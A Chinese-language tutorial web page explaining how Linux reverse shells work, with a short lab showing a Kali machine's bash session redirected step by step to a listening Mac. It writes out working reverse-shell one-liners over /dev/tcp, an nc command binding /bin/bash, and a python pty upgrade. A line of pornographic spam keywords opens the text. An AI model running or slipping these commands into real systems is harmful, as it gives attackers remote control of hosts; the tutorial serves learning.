欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

linux反彈shell的原理詳解

 更新時(shí)間:2020年10月16日 10:06:59   作者:Shanfenglan7  
這篇文章主要介紹了linux反彈shell的原理詳解,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧

完整命令

反彈shell命令:

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
bash -i > /dev/tcp/ip/port 0>&1 2>&1

利用nc反彈shell:

nc -lvvp 12345 -t -e /bin/bash

原理

bash -i > /dev/tcp/ip/port 0>&1 2>&1
bash -i 打開一個(gè)交互式的bash
&是為了區(qū)分文件1和文件描述符1的
a>&b 的意思是 a>b 2>&1
0代表輸入 ,0>&1 意思是,將輸出的窗口上所輸入的值當(dāng)作當(dāng)前窗口的輸入。反彈shell后會(huì)有兩個(gè)窗口,即靶機(jī)的shell窗口跟攻擊機(jī)的shell口。這命令的意思也可以理解為,將攻擊機(jī)窗口的輸入當(dāng)作靶機(jī)窗口的輸入最終輸入給靶機(jī)。2代表標(biāo)準(zhǔn)錯(cuò)誤輸出。

實(shí)驗(yàn)

通過(guò)一個(gè)小實(shí)驗(yàn)幫助大家理解

第一步,將shell的正確輸出重定向到外部主機(jī)

假設(shè)我們?cè)趉ali上輸入的命令為:
bash -i > /dev/tcp/192.168.124.1/9999,這句話的意思是將交互式shell的標(biāo)準(zhǔn)輸出重定向到192.168.124.1的9999端口。

在mac上監(jiān)聽端口命令為:nc -l 9999

在這里插入圖片描述

首先在kali上輸入whoami命令,發(fā)現(xiàn)沒(méi)有回顯,因?yàn)榛仫@被重定向到了mac上。

在這里插入圖片描述

但是當(dāng)我們?cè)趉ali上出入錯(cuò)誤命令的時(shí)候,卻存在回顯。

在這里插入圖片描述

第二步,將錯(cuò)誤輸出重定向到外部主機(jī)

我們只需要在上面的命令后面加上 2>&1即可,意思為將錯(cuò)誤輸出重定向到標(biāo)準(zhǔn)輸出上,也就是重定向到我們的外部主機(jī)。

在這里插入圖片描述

這時(shí)候發(fā)現(xiàn)在kali上按鍵盤已經(jīng)沒(méi)有任何回顯了,回顯全部出現(xiàn)在了mac的shell上:

在這里插入圖片描述

這是因?yàn)槲覀円呀?jīng)將所有的輸出都重定向到了外部主機(jī)上,但問(wèn)題是現(xiàn)在我們的控制權(quán)還在kali上,mac無(wú)法進(jìn)行任何輸出操作,只能顯示輸出。這時(shí)候我們幾句需要將輸入的權(quán)限給予我們的mac。

第三步,交出輸入權(quán)限

只需要在第二步命令的基礎(chǔ)上加上 0>&1即可。

在這里插入圖片描述

這時(shí)候已經(jīng)可以在mac上完全控制kali的shell了,實(shí)驗(yàn)結(jié)束。

其他

當(dāng)shell不穩(wěn)定時(shí)候用python的虛擬化終端:

python -c "import pty;pty.spawn('/bin/bash')"

參考:
https://www.freebuf.com/news/142195.html #將shell轉(zhuǎn)換成完全tty
https://blog.csdn.net/Auuuuuuuu/article/details/89059176
https://www.anquanke.com/post/id/87017

到此這篇關(guān)于linux反彈shell的原理詳解的文章就介紹到這了,更多相關(guān)linux反彈shell內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

  • shell腳本之判斷輸入?yún)?shù)是否為整數(shù)值的實(shí)例

    shell腳本之判斷輸入?yún)?shù)是否為整數(shù)值的實(shí)例

    今天小編就為大家分享一篇shell腳本之判斷輸入?yún)?shù)是否為整數(shù)值的實(shí)例,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。一起跟隨小編過(guò)來(lái)看看吧
    2018-07-07
  • LINUX下的流量監(jiān)控shell腳本

    LINUX下的流量監(jiān)控shell腳本

    這篇文章主要介紹了LINUX下的流量監(jiān)控shell腳本,可以適用任何Linux版本,需要的朋友可以參考下
    2014-04-04
  • Linux?中的export與alias命令詳解

    Linux?中的export與alias命令詳解

    export和alias都是用來(lái)簡(jiǎn)化命令行輸入的工具。export用于設(shè)置環(huán)境變量,環(huán)境變量是一些系統(tǒng)級(jí)別的變量,用于指定一些系統(tǒng)的默認(rèn)值或者搜索路徑等,這篇文章主要介紹了Linux?中的export與alias命令,需要的朋友可以參考下
    2023-04-04
  • linux shell發(fā)送Email郵件的方法詳解

    linux shell發(fā)送Email郵件的方法詳解

    這篇文章主要介紹了linux shell發(fā)送Email郵件的方法,文中介紹的內(nèi)容包括發(fā)送一封簡(jiǎn)單的郵件、郵件的格式、郵件標(biāo)題使用中文以及郵件內(nèi)容使用html等相關(guān)資料,需要的朋友可以參考借鑒,下面來(lái)一起看看吧。
    2017-01-01
  • Linux中的grep?-v、-e、-E用法小結(jié)

    Linux中的grep?-v、-e、-E用法小結(jié)

    grep是一種強(qiáng)大的文本搜索工具,它能使用正則表達(dá)式搜索文本,并把匹配的行打印出來(lái),這篇文章主要介紹了Linux之grep?-v、-e、-E用法總結(jié),需要的朋友可以參考下
    2022-11-11
  • Shell中調(diào)用、引用、包含另一個(gè)腳本文件的三種方法

    Shell中調(diào)用、引用、包含另一個(gè)腳本文件的三種方法

    這篇文章主要介紹了Shell中調(diào)用、引用、包含另一個(gè)腳本文件的三種方法,需要的朋友可以參考下
    2014-04-04
  • Shell中使用grep、sed正則提取和替換字符串

    Shell中使用grep、sed正則提取和替換字符串

    這篇文章主要介紹了Shell中使用grep、sed正則提取和替換字符串,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2020-12-12
  • 什么是Shell?Shell腳本基礎(chǔ)知識(shí)詳細(xì)介紹

    什么是Shell?Shell腳本基礎(chǔ)知識(shí)詳細(xì)介紹

    這篇文章主要介紹了什么是Shell?Shell腳本基礎(chǔ)知識(shí)介紹,本文是一篇Shell腳本入門文章,在本文你可學(xué)到什么是Shell、有多少種Shell、一個(gè)Shell腳本代碼實(shí)例,需要的朋友可以參考下
    2014-07-07
  • Shell腳本注釋寫法

    Shell腳本注釋寫法

    這篇文章主要介紹了Shell腳本注釋的3種寫法,包含單行注釋的方法和多行注釋的多種方法,需要的朋友可以參考下
    2014-07-07
  • linux shell 根據(jù)進(jìn)程名獲取pid的實(shí)現(xiàn)方法

    linux shell 根據(jù)進(jìn)程名獲取pid的實(shí)現(xiàn)方法

    這篇文章主要介紹了linux shell 根據(jù)進(jìn)程名獲取pid的實(shí)現(xiàn)方法,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2020-05-05

最新評(píng)論